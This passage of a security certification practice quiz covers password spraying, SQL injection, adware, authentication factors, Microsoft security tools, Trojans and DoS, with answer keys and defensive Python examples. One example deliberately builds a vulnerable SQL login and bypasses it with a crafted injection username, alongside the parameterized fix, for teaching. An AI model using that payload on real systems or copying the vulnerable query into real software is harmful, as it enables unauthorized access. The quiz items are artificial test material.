Phishing highlights the critical role of user awareness and education in cybersecurity. Effective mitigation combines technical controls like filtering, MFA, and anomaly detection with behavioral training. Organizations benefit from continuous evaluation of phishing attempts and reinforcement of secure practices. The attack demonstrates that human factors often represent the weakest link in security, requiring both policy and practical interventions. By educating users to recognize suspicious messages, verify sources, and avoid risky behaviors, organizations strengthen defenses against credential theft, identity compromise, and malware distribution. Phishing emphasizes the interplay of human and technical elements in comprehensive cybersecurity strategy.
Question 193:
Which attack attempts to guess passwords for multiple accounts using a small set of common passwords?
A) Password spraying
B) Brute force attack
C) SQL injection
D) Ransomware
Answer: A) Password spraying
Explanation:
Password spraying is an attack where attackers try a few common passwords across a large number of accounts, rather than all possible combinations for a single account. This approach stays under per-account lockout thresholds and is highly effective in environments with weak password policies or reused passwords. Attackers typically use previously leaked credentials, default passwords, or simple predictable passwords. Security teams mitigate password spraying through multi-factor authentication (MFA), lockout policies, strong password enforcement, and monitoring of authentication logs. Detection looks for the pattern rather than the password, which defenders usually cannot see: many distinct accounts each receiving a small number of failures in a short window, often from the same source address or user agent, or a sudden rise in the number of accounts failing at once.
Brute force attacks attempt every possible password combination on a single account. Brute force is more exhaustive and often triggers security measures like lockouts, unlike password spraying.
SQL injection targets backend database queries via input manipulation to retrieve or alter data. SQL injection attacks are unrelated to authentication attempts or password guessing.
Ransomware encrypts files and demands payment for decryption. Ransomware attacks are not designed to guess passwords but to extort victims through file encryption.
Password spraying demonstrates the importance of layered security, combining technical safeguards and user awareness. Organizations protect accounts by enforcing strong password requirements, monitoring unusual login behavior, and integrating MFA. By understanding attacker behavior and techniques, security teams can proactively implement defenses and reduce the risk of credential compromise. Password spraying emphasizes that even simple misconfigurations or predictable behaviors can expose multiple accounts to compromise, highlighting the need for continuous monitoring, enforcement of security policies, and adoption of proactive protective measures. Organizations that combine awareness, technical controls, and auditing are better positioned to detect, prevent, and respond to password-based attacks.
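The detection approach described above (looking for failures spread across many accounts from one source, as opposed to many failures against one account) can be made concrete. The following is an added example, not part of the original question set or any vendor's code; it assumes a constructed, simplified VPN authentication log format of the form `timestamp src=IP user=NAME result=FAIL|SUCCESS`, which is not taken from any real product.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (hypothetical format, not from a real VPN appliance).
# 203.0.113.5 tries one password against many accounts   -> spraying signature
# 198.51.100.7 hammers a single account                   -> brute-force signature
# 192.0.2.9 is a user who mistyped once and then logged in -> benign
SAMPLE_LOG = """\
2024-03-01T09:00:01Z src=203.0.113.5 user=alice result=FAIL
2024-03-01T09:00:02Z src=203.0.113.5 user=bob result=FAIL
2024-03-01T09:00:03Z src=203.0.113.5 user=carol result=FAIL
2024-03-01T09:00:04Z src=203.0.113.5 user=dave result=FAIL
2024-03-01T09:00:05Z src=203.0.113.5 user=erin result=FAIL
2024-03-01T09:00:06Z src=203.0.113.5 user=frank result=SUCCESS
2024-03-01T09:05:00Z src=198.51.100.7 user=alice result=FAIL
2024-03-01T09:05:01Z src=198.51.100.7 user=alice result=FAIL
2024-03-01T09:05:02Z src=198.51.100.7 user=alice result=FAIL
2024-03-01T09:05:03Z src=198.51.100.7 user=alice result=FAIL
2024-03-01T09:05:04Z src=198.51.100.7 user=alice result=FAIL
2024-03-01T09:05:05Z src=198.51.100.7 user=alice result=FAIL
2024-03-01T09:10:00Z src=192.0.2.9 user=grace result=FAIL
2024-03-01T09:10:30Z src=192.0.2.9 user=grace result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse_log(text):
    """Turn the constructed log text into (timestamp, src, user, result) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than crash the detector
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["src"], m["user"], m["result"]))
    return events


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Spraying signature: one source fails against >= min_users DISTINCT accounts
    inside `window`. Returns {src: set_of_targeted_users}."""
    fails_by_src = defaultdict(list)
    for ts, src, user, result in events:
        if result == "FAIL":
            fails_by_src[src].append((ts, user))
    hits = {}
    for src, fails in fails_by_src.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[src] = users
                break
    return hits


def detect_bruteforce(events, window=timedelta(minutes=10), min_failures=5):
    """Brute-force signature: one (src, user) pair fails >= min_failures times
    inside `window`. Returns {(src, user): failure_count}."""
    fails_by_pair = defaultdict(list)
    for ts, src, user, result in events:
        if result == "FAIL":
            fails_by_pair[(src, user)].append(ts)
    hits = {}
    for pair, times in fails_by_pair.items():
        times.sort()
        for i, start in enumerate(times):
            count = sum(1 for t in times[i:] if t - start <= window)
            if count >= min_failures:
                hits[pair] = count
                break
    return hits


def successes_after_spray(events, spray_hits):
    """Accounts that authenticated successfully from a spraying source: these are
    the ones to treat as probably compromised and reset first."""
    return {(src, user) for _, src, user, result in events
            if result == "SUCCESS" and src in spray_hits}


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("spray:", detect_spray(evts))
    print("brute:", detect_bruteforce(evts))
    print("escalate:", successes_after_spray(evts, detect_spray(evts)))
```

The two detectors key on different dimensions of the same failed-login stream: spraying is "many users, few attempts each", brute force is "one user, many attempts". A per-source view will miss a spray that rotates through many source addresses; for that case the same logic is run with the source dimension dropped and the count of distinct accounts failing with a shared timing pattern used instead.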
Question 194:
Which attack exploits input vulnerabilities to retrieve or manipulate data in a database?
A) SQL injection
B) Cross-site scripting (XSS)
C) Phishing
D) Adware
Answer: A) SQL injection
Explanation:
SQL injection is a cyberattack that targets databases by exploiting unvalidated or improperly sanitized user input. Attackers insert malicious SQL commands into input fields or URLs to manipulate queries, retrieve sensitive data, modify records, or bypass authentication mechanisms. SQL injection is particularly effective against applications that dynamically construct SQL statements without using parameterized queries, stored procedures, or input validation. Prevention strategies include input validation, prepared statements, stored procedures, limiting database privileges, and monitoring for unusual query patterns. SQL injection attacks can result in data breaches, unauthorized access, and operational disruption, highlighting the importance of secure coding practices and robust application security measures.
Cross-site scripting (XSS) injects scripts into web applications for client-side execution, targeting users rather than databases. XSS is unrelated to manipulating backend SQL queries.
Phishing deceives users into revealing credentials or personal information. Phishing exploits human behavior, not database query vulnerabilities.
Adware delivers advertisements and tracks user activity for monetization. Adware does not manipulate databases or execute SQL commands.
SQL injection highlights the intersection of application design, input validation, and database security. Organizations implement secure coding practices, enforce least privilege access, conduct vulnerability scanning, and perform penetration testing to detect injection points. SQL injection attacks underscore the consequences of poor input handling and demonstrate the need for layered defenses, monitoring, and proactive mitigation. By addressing both technical and procedural aspects of application security, organizations protect data integrity, confidentiality, and availability, reducing the risk of compromise through targeted SQL exploitation.
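To show why the explanation insists on parameterized queries, here is an added example (not from the question set or any real application) of a login check written three ways against an in-memory SQLite table: the dynamically built query that the text warns about, the same check with placeholders, and the placeholder version with input validation in front of it. The table, the user row and the password-hashing scheme are all constructed for the demonstration; a production system would use a salted, slow password hash rather than plain SHA-256.

```python
import hashlib
import re
import sqlite3


def _hash(password: str) -> str:
    # Constructed stand-in for a real password hash (use scrypt/argon2 in practice).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed sample database with a single user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("alice", _hash("correct horse")))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Dynamic string construction: user input becomes part of the SQL text, so a
    quote in the username changes the meaning of the statement."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password_hash = '{_hash(password)}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Prepared statement: the driver sends the values out of band; they are
    compared as data and never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, _hash(password))).fetchone() is not None


USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")


def login_defended(conn, username, password):
    """Defense in depth: allow-list validation of the username in front of the
    parameterized query. Validation alone is not the fix; the placeholder is."""
    if not USERNAME_RE.fullmatch(username):
        return False
    return login_parameterized(conn, username, password)


if __name__ == "__main__":
    db = make_db()
    # A username containing a quote and an SQL comment marker ends the WHERE clause
    # early in the vulnerable version, so the password is never checked.
    crafted = "alice'--"
    print("vulnerable :", login_vulnerable(db, crafted, "wrong"))      # True
    print("parameterized:", login_parameterized(db, crafted, "wrong"))  # False
    print("defended   :", login_defended(db, crafted, "wrong"))         # False
```

The vulnerable function returns true for the crafted username because, after string substitution, everything from `--` to the end of the line is an SQL comment and the `AND password_hash = ...` condition disappears. The parameterized version receives exactly the same bytes but treats them as a username value that matches no row. Running the application's database account with only the privileges the query needs (here, `SELECT` on `users`) limits what a successful injection elsewhere in the application could read or change.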
Question 195:
Which malware primarily tracks user activity and displays advertisements without user consent?
A) Adware
B) Ransomware
C) Trojan horse
D) Rootkit
Answer: A) Adware
Explanation:
Adware is a type of malware that delivers unwanted advertisements and tracks user behavior for monetization purposes. Adware can display pop-ups, banners, or embedded ads in web browsers or applications. It collects information such as browsing habits, search history, or software usage patterns to generate targeted ads. While often not overtly destructive, adware can degrade system performance, compromise privacy, and act as a gateway for additional malware. Detection involves endpoint protection, anti-malware tools, and monitoring for unusual system behavior. Users should avoid installing unknown software and carefully review installation prompts to prevent adware inclusion. Organizations deploy security policies, web filters, and endpoint monitoring to mitigate adware risks.
Ransomware encrypts files and demands payment for decryption. It is extortion-based, not focused on advertising or tracking user activity.
Trojan horses disguise themselves as legitimate software to deliver malicious payloads. Trojans may deliver adware but are defined by their deceptive delivery mechanism rather than advertising behavior.
Rootkits hide within operating systems to maintain persistent access. Rootkits focus on stealth and control rather than monetization through advertisements or tracking.
Adware emphasizes the need for secure software practices, endpoint monitoring, and user awareness. Organizations should educate users about safe downloads, implement anti-malware defenses, and monitor for suspicious activity. Adware illustrates how malware can exploit user behavior for profit while compromising system performance and privacy. By combining technical controls, user education, and policy enforcement, organizations can minimize exposure to adware and maintain operational integrity, demonstrating that even non-destructive malware can create security and usability challenges.
Question 196:
Which authentication factor relies on something the user possesses, such as a smart card or security token?
A) Possession-based authentication
B) Knowledge-based authentication
C) Biometric authentication
D) Certificate-based authentication
Answer: A) Possession-based authentication
Explanation:
Possession-based authentication relies on an object or device that the user physically owns to verify identity. Examples include security tokens, smart cards, hardware keys, or mobile devices that generate one-time passcodes. This type of authentication is effective because it ties access to a physical object, which is difficult for attackers to replicate or use remotely without possession. Organizations often combine possession-based factors with knowledge-based (passwords) or biometric factors as part of multi-factor authentication (MFA) to strengthen security. Management of possession-based authentication requires procedures for issuing, revoking, and replacing tokens, as well as implementing secure distribution and usage policies to prevent theft or loss.
Knowledge-based authentication relies on information the user knows, such as a password or PIN. While widely used, knowledge-based methods can be compromised through phishing, social engineering, or credential reuse. Knowledge alone does not provide the physical verification that possession-based methods offer.
Biometric authentication relies on unique physical or behavioral characteristics, such as fingerprints, facial recognition, or iris scans. Biometric factors are inherent to the user and cannot be transferred like a token or smart card, making them distinct from possession-based factors.
Certificate-based authentication uses cryptographic certificates issued by trusted authorities to verify identity. Certificates are digital constructs, not physical objects owned by the user, and therefore differ from possession-based factors.
Possession-based authentication strengthens security by tying access to physical objects under the user’s control. Organizations enforce token management policies, secure storage, and MFA integration to mitigate risks associated with token theft, duplication, or loss. By combining possession factors with other authentication methods, businesses protect sensitive systems from unauthorized access, enhance identity verification, and reduce the likelihood of credential compromise. Possession-based authentication remains a critical component of access control strategies in enterprise, government, and financial environments where robust security is required. It complements knowledge-based and biometric factors to create a layered defense against both technical attacks and social engineering threats.
Question 197:
Which Microsoft security solution monitors on-premises Active Directory for suspicious activities and compromised accounts?
A) Microsoft Defender for Identity
B) Microsoft Intune
C) Microsoft OneDrive
D) Microsoft Planner
Answer: A) Microsoft Defender for Identity
Explanation:
Microsoft Defender for Identity is a cloud-based security solution designed to monitor user behavior and authentication events in on-premises Active Directory and Microsoft 365 environments. It continuously collects telemetry from directory services, analyzes authentication patterns, and uses machine learning to detect anomalies such as lateral movement, privilege escalation, unusual login attempts, or potential account compromise. Defender for Identity integrates with Azure AD and other Microsoft security services, providing actionable alerts that allow security teams to investigate threats quickly and remediate compromised accounts. It also supports behavioral analytics to identify insider threats, detect compromised credentials, and prevent unauthorized access before significant damage occurs.
Microsoft Intune focuses on device management, compliance enforcement, and conditional access policies. While Intune contributes to security posture, it does not monitor Active Directory for suspicious account activity or authentication anomalies.
Microsoft OneDrive is primarily a cloud storage platform enabling file storage, sharing, and synchronization. OneDrive does not provide monitoring for directory activity or account security alerts.
Microsoft Planner is a task and project management tool designed for organizing and tracking work within teams. Planner has no security monitoring capabilities and does not integrate with authentication systems for threat detection.
Defender for Identity provides specialized monitoring and threat detection capabilities, offering deep visibility into authentication events, user behavior, and potential compromise within an organization’s identity infrastructure. It correlates telemetry from multiple sources to generate comprehensive security alerts. Security teams can investigate incidents, identify compromised accounts, and take preventative measures to mitigate risks. By detecting suspicious activities such as unusual access patterns, multiple failed logins, or privilege abuse, Defender for Identity strengthens an organization’s cybersecurity posture. It also integrates with other Microsoft 365 security solutions to provide a unified approach to identity protection. Compared to Intune, OneDrive, or Planner, Defender for Identity is purpose-built to secure directory services and user identities, making it the most appropriate solution for detecting compromised accounts and preventing unauthorized access.
Question 198:
Which malware disguises itself as legitimate software to deliver a hidden malicious payload?
A) Trojan horse
B) Rootkit
C) Adware
D) Ransomware
Answer: A) Trojan horse
Explanation:
A Trojan horse is a type of malware that appears to be legitimate software while secretly performing malicious actions. Attackers use deception to trick users into installing Trojans, often by masquerading as utility tools, games, or software updates. Once executed, a Trojan can steal credentials, install additional malware, create backdoors, or provide remote control to attackers. Trojans rely on social engineering rather than exploiting technical vulnerabilities directly, making user behavior a critical factor in their success. Organizations defend against Trojans using endpoint protection, malware scanning, software verification, user education, and restricting execution of unverified software.
Rootkits embed themselves deeply into an operating system to hide processes, files, or activities, maintaining persistent control. While rootkits may be delivered via a Trojan, their defining feature is stealth and persistence, not initial deception.
Adware delivers unwanted advertisements and tracks user activity for monetization. Adware is generally non-malicious in function, although it can degrade performance and compromise privacy, unlike Trojans, which actively perform harmful operations.
Ransomware encrypts files or locks systems to demand payment. Ransomware is overt and extortion-focused, rather than relying on deception for initial delivery.
Trojan horses highlight the risk posed by deceptive software, emphasizing the importance of user awareness, secure downloading practices, and robust endpoint defenses. Trojans demonstrate that even software appearing legitimate can compromise security and introduce secondary threats like rootkits or ransomware. Organizations combine technical controls, behavioral training, and monitoring to reduce Trojan infections and minimize potential damage. Properly implemented policies, verification of software sources, and awareness of social engineering tactics are essential for mitigating the threat posed by Trojan malware.
Question 199:
Which Microsoft service provides cloud storage, file sharing, and integration with Office 365 applications?
A) Microsoft OneDrive
B) Microsoft Intune
C) Microsoft Planner
D) Microsoft Defender for Identity
Answer: A) Microsoft OneDrive
Explanation:
Microsoft OneDrive is a cloud storage platform that allows users to store files, share them securely, and collaborate in real time. OneDrive integrates with Microsoft Office applications, Teams, and SharePoint, enabling users to co-author documents, maintain version control, and access files from any device. Files are encrypted both in transit and at rest to maintain confidentiality. Administrators can enforce sharing permissions, track activity, apply retention policies, and monitor access to ensure compliance. OneDrive also provides ransomware detection, file recovery, and auditing features to maintain security and operational resilience.
Microsoft Intune is a device and application management solution. While Intune contributes to endpoint security, it does not provide cloud storage or file-sharing capabilities.
Microsoft Planner is a project and task management tool, designed to organize work and track progress rather than storing or sharing files.
Microsoft Defender for Identity monitors authentication events for suspicious activity and compromised accounts. It is focused on security monitoring, not file storage or collaboration.
OneDrive enhances productivity and collaboration by providing secure, accessible, and centralized storage. Its integration with Microsoft 365 ensures seamless access and co-authoring capabilities. Users can access files across devices, while administrators maintain control through permissions, monitoring, and compliance policies. OneDrive reduces reliance on local storage, improves operational efficiency, and protects data integrity through built-in security and recovery features. It is an essential solution for modern workplaces, supporting mobility, collaboration, and secure data management.
Question 200:
Which attack involves overwhelming a system, network, or service with excessive traffic to disrupt availability?
A) Denial of Service (DoS)
B) Phishing
C) Password spraying
D) SQL injection
Answer: A) Denial of Service (DoS)
Explanation:
A Denial of Service (DoS) attack floods a system, network, or service with an excessive amount of traffic, overwhelming resources and preventing legitimate users from accessing services. DoS attacks exploit bandwidth, memory, or application limits, aiming to disrupt availability. Techniques include SYN floods, UDP floods, ICMP floods, and HTTP request floods. Organizations mitigate DoS attacks using rate limiting, traffic filtering, firewalls, load balancers, cloud-based DDoS protection, and network segmentation. Continuous monitoring of network traffic and system performance helps detect and respond to ongoing attacks. Incident response planning ensures rapid mitigation, preserving service continuity and reducing business impact.
Phishing manipulates users into revealing credentials or sensitive information. Phishing targets human behavior, not system availability.
Password spraying attempts common passwords across multiple accounts to avoid lockouts. Password spraying targets authentication, not system resource exhaustion.
SQL injection exploits database queries via unvalidated input to retrieve or manipulate data. SQL injection affects data integrity and access, not availability.
DoS attacks emphasize the importance of availability as a critical aspect of security. Organizations implement proactive measures such as redundancy, monitoring, traffic analysis, and cloud-based protections to prevent disruption. DoS demonstrates how attackers can exploit system limits to degrade or halt operations. Effective defense requires layered solutions combining technical controls, operational planning, and real-time detection. Mitigation strategies include preparing incident response, deploying resilient infrastructure, and continuously monitoring systems to detect abnormal traffic patterns. DoS attacks underscore the need for robust, comprehensive measures to protect network and system availability against deliberate disruption.
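Rate limiting, the first mitigation the explanation names, is easy to reason about once written down. The following added example (not from the question set or any real firewall or load balancer) implements a per-source token bucket and replays a constructed request stream through it: one source flooding 100 requests in a second and another sending one request per second. The timestamps and addresses are constructed for the demonstration.

```python
from collections import defaultdict


class TokenBucketLimiter:
    """Per-source token bucket. Each source may burst up to `capacity` requests,
    after which it is held to `rate` requests per second; excess is dropped."""

    def __init__(self, rate: float, capacity: float):
        self.rate = float(rate)
        self.capacity = float(capacity)
        self.tokens = {}                 # src -> tokens currently available
        self.last = {}                   # src -> time of last refill
        self.dropped = defaultdict(int)  # src -> requests rejected

    def allow(self, src: str, now: float) -> bool:
        if src not in self.tokens:       # first sight of this source: full bucket
            self.tokens[src] = self.capacity
            self.last[src] = now
        # Refill proportionally to elapsed time, never above capacity.
        elapsed = now - self.last[src]
        self.tokens[src] = min(self.capacity, self.tokens[src] + elapsed * self.rate)
        self.last[src] = now
        if self.tokens[src] >= 1.0:
            self.tokens[src] -= 1.0
            return True
        self.dropped[src] += 1
        return False


def replay(requests, rate=1.0, capacity=5):
    """Feed (timestamp, src) pairs through a limiter in time order and report,
    per source, how many requests were served and how many were dropped."""
    limiter = TokenBucketLimiter(rate, capacity)
    served = defaultdict(int)
    for ts, src in sorted(requests):
        if limiter.allow(src, ts):
            served[src] += 1
    return dict(served), dict(limiter.dropped)


# Constructed traffic: a flood (100 requests inside one second) and a normal client.
FLOOD = [(i / 100.0, "203.0.113.5") for i in range(100)]
NORMAL = [(float(i), "198.51.100.7") for i in range(10)]

if __name__ == "__main__":
    served, dropped = replay(FLOOD + NORMAL, rate=1.0, capacity=5)
    print("served :", served)    # flood source gets its burst of 5, normal client all 10
    print("dropped:", dropped)   # 95 flood requests rejected
```

The bucket protects the service from a single abusive source without touching the well-behaved one, which is the property the explanation is after when it lists rate limiting alongside filtering. It does not help against a distributed flood where each source stays under the limit; that is the case for the upstream, cloud-based scrubbing the text also mentions, and for monitoring aggregate request volume rather than per-source counts.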